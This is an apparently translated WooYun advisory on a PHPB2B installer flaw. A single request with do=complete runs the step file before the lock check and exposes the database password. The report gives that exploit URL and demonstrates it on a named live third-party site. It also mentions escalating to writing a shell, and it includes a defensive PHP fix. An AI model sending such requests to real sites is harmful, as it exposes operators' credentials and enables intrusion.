
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-090306

Title: A flaw in PHPB2B allows the MySQL password to be viewed directly

Vendor: phpb2b.com

Author: Th1nk

Submitted: 2015-02-11 10:08

Fix deadline: 2015-04-02 10:23

Published: 2015-04-02 10:23

Type: Sensitive information disclosure

Severity: High

Self-assessed rank: 20

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-02-11: Details sent to the vendor; awaiting vendor handling
2015-02-16: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-04-12: Details opened to core white hats and domain experts
2015-04-22: Details opened to regular white hats
2015-05-02: Details opened to intern white hats
2015-04-02: Details disclosed to the public

Brief description:

A flaw in PHPB2B allows the MySQL password to be viewed directly.

Detailed description:

A flaw in PHPB2B allows the MySQL password to be viewed directly.
Tested against the latest version downloaded from the official site.
The installer file is install/install.php; let's look at its code.

<?php
/**
 * [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved.
 * The contents of this file are subject to the License; you may not use this file except in compliance with the License.
 *
 * @version $Revision: 2048 $
 */
session_start();
error_reporting(E_ERROR | E_NOTICE);
set_magic_quotes_runtime(0);
ini_set('magic_quotes_sybase', 0);
ini_set('max_execution_time', '300');
if (isset($_GET['act'])) {
    if ($_GET['act'] == "phpinfo") {
        die(phpinfo());
    }
}
if (!defined('DIRECTORY_SEPARATOR')) {
    define('DIRECTORY_SEPARATOR', '/');
}
define('DS', DIRECTORY_SEPARATOR);
define('TIME', time());
define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7));
define('MIN_PHP_VERSION', '5.0.0');
//define('JSMIN_AS_LIB', true); // prevents auto-run on include
require '../phpb2b_version.php';
require '../configs/config.inc.php';
require '../libraries/core/paths.php';
if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) {
    echo 'PHPB2B ' . PHPB2B_VERSION . ' require php' . MIN_PHP_VERSION . ', but your php version is ' . PHP_VERSION . ".\n";
    exit;
}
define('IN_PHPB2B', true);
if (!defined('LIB_PATH')) define('LIB_PATH', PHPB2B_ROOT . 'libraries' . DS);
require '../libraries/global.func.php';
require '../libraries/func.sql.php';
require "../libraries/db_mysql.inc.php";
require "../libraries/core/object.php";
require "../libraries/core/controller.php";
require "../libraries/file.class.php";
require "../libraries/template.class.php";
require "../libraries/source/error.class.php";
list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']);
if (file_exists(PHPB2B_ROOT . 'languages' . DS . strtolower($accept_language) . DS . "global.csv")) {
    $app_lang = strtolower($accept_language);
}
if (!is_writable(PHPB2B_ROOT . "data" . DS)) {
    echo PHPB2B_ROOT . "data" . DS . " is not writeable.\n";
    exit;
}
if (!empty($_GET['app_lang'])) {
    $app_lang = $_GET['app_lang'];
}
if (!is_file(PHPB2B_ROOT . "data" . DS . "language" . DS . $app_lang . DS . "default.conf")) {
    pb_configmake($app_lang);
}
if (!defined('CACHE_PATH')) {
    define('CACHE_PATH', PHPB2B_ROOT . "data" . DS . "cache" . DS . $app_lang . DS);
    define('CACHE_LANG_PATH', PHPB2B_ROOT . "data" . DS . "cache" . DS . $app_lang . DS);
    define('CACHE_COMMON_PATH', PHPB2B_ROOT . "data" . DS . "cache" . DS);
}
//language
$smarty = new TemplateEngines();
$sections = array('install', 'javascript');
//da($smarty);
$smarty->configLoad('default.conf', $sections);
$arrTemplate = $smarty->getConfigVars();
extract($arrTemplate);
//:~
$db = new DB_Sql();
$file_cls = new Files();
$pb_protocol = 'http';
if (isset($_SERVER['HTTPS']) && (strtolower($_SERVER['HTTPS']) != 'off')) {
    $pb_protocol = 'https';
}
$PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']);
$BASESCRIPT = basename($PHP_SELF);
list($BASEFILENAME) = explode('.', $BASESCRIPT);
$install_url = htmlspecialchars($pb_protocol . "://" . pb_getenv('HTTP_HOST') . preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))) . '/');
$siteUrl = substr($install_url, 0, -(strlen($BASEFILENAME) + 1));
$time_stamp = TIME;
if ($_REQUEST) {
    if (!MAGIC_QUOTES_GPC) {
        $_REQUEST = pb_addslashes($_REQUEST);
        if ($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE);
    }
    extract($_REQUEST, EXTR_SKIP);
}
if (!isset($_GET['step'])) {
    $step = '1';
} else {
    $step = intval($_GET['step']);
}
// The step file is included here, before the install.lock check below has run.
if (isset($_GET['do'])) {
    $do = trim($_GET['do']);
    if ($do == "complete") {
        include "step" . $step . ".inc.php";
        exit;
    }
}
// The "already installed" check only runs if the request did not exit above.
if (file_exists(PHPB2B_ROOT . 'data/install.lock')) {
    $msg = L("install_locked", "tpl");
    Errors::showError($msg);
    exit;
}


Simply passing do=complete is enough to include the step file,
but the permission check only comes afterwards, at lines 104-108 of the file:

if (file_exists(PHPB2B_ROOT . 'data/install.lock')) {
    $msg = L("install_locked", "tpl");
    Errors::showError($msg);
    exit;
}


So while we cannot reinstall the site, we can still obtain important information, for example the MySQL database account and password!!
Demonstration on a local machine:
http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete

(screenshot: 1.png)


Because install.php is not deleted by default, any site that has installed phpb2b will expose its MySQL password this way. If remote connections or phpMyAdmin are enabled, that leads straight to the admin password, writing a shell, and so on; you know the rest.
Since the vendor's own site has removed the install folder, it cannot be demonstrated there; a random site found online instead:
http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete

(screenshot: 1.png)


And it is even root~
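The root cause described above is an ordering bug: the installer dispatches to the step file before it checks whether the installation is already locked. The following is an added example of the defensive ordering a maintainer would want in the installer prologue; it is not PHPB2B's own code. It assumes PHPB2B_ROOT is already defined as in install.php, that the installer ships step files named step1.inc.php through step5.inc.php (an assumption, since the page only shows step=5), and that the language directories use plain lowercase names such as zh-cn.

```php
<?php
// Added example (not PHPB2B's own code): a fail-closed prologue for
// install/install.php. Assumes PHPB2B_ROOT is defined exactly as in the
// original installer.

// 1. Refuse to do anything at all once installation has completed.
//    In the original file this check sits AFTER the `do=complete` include,
//    so it never runs for that request. Putting it first closes the gap.
if (file_exists(PHPB2B_ROOT . 'data/install.lock')) {
    header('HTTP/1.1 403 Forbidden');
    echo "Installation is locked. Delete the install/ directory after setup.\n";
    exit;
}

// 2. Resolve the step against an explicit allowlist rather than trusting
//    intval() alone. (Assumption: the installer ships step1..step5.inc.php.)
$allowed_steps = array(1, 2, 3, 4, 5);
$step = isset($_GET['step']) ? intval($_GET['step']) : 1;
if (!in_array($step, $allowed_steps, true)) {
    $step = 1;
}

// 3. The language parameter flows into filesystem paths (pb_configmake,
//    CACHE_PATH), so restrict it to the characters a language tag needs.
//    (Assumption: directory names look like "en" or "zh-cn".)
$app_lang = isset($_GET['app_lang']) ? strtolower($_GET['app_lang']) : 'en';
if (!preg_match('/^[a-z0-9-]{2,10}$/', $app_lang)) {
    $app_lang = 'en';
}

// 4. Only now dispatch to the step file. The include path is built solely
//    from the allowlisted integer, so it can only name a known step file.
if (isset($_GET['do']) && trim($_GET['do']) === 'complete') {
    $step_file = dirname(__FILE__) . '/step' . $step . '.inc.php';
    if (!is_file($step_file)) {
        header('HTTP/1.1 404 Not Found');
        exit;
    }
    include $step_file;
    exit;
}
```

Reordering the lock check is the minimal code fix; the operational fix the report itself points at is to delete the install/ directory after setup so that no installer code is reachable on a production site. Both should be applied, since the lock file is only as safe as the data/ directory that holds it.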

Proof of vulnerability:

(Same content as the detailed description above.)

Fix recommendation:

Filter the input.

Copyright notice: please credit the source when reposting: Th1nk@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-04-02 10:23

Vendor reply:

Latest status:

None yet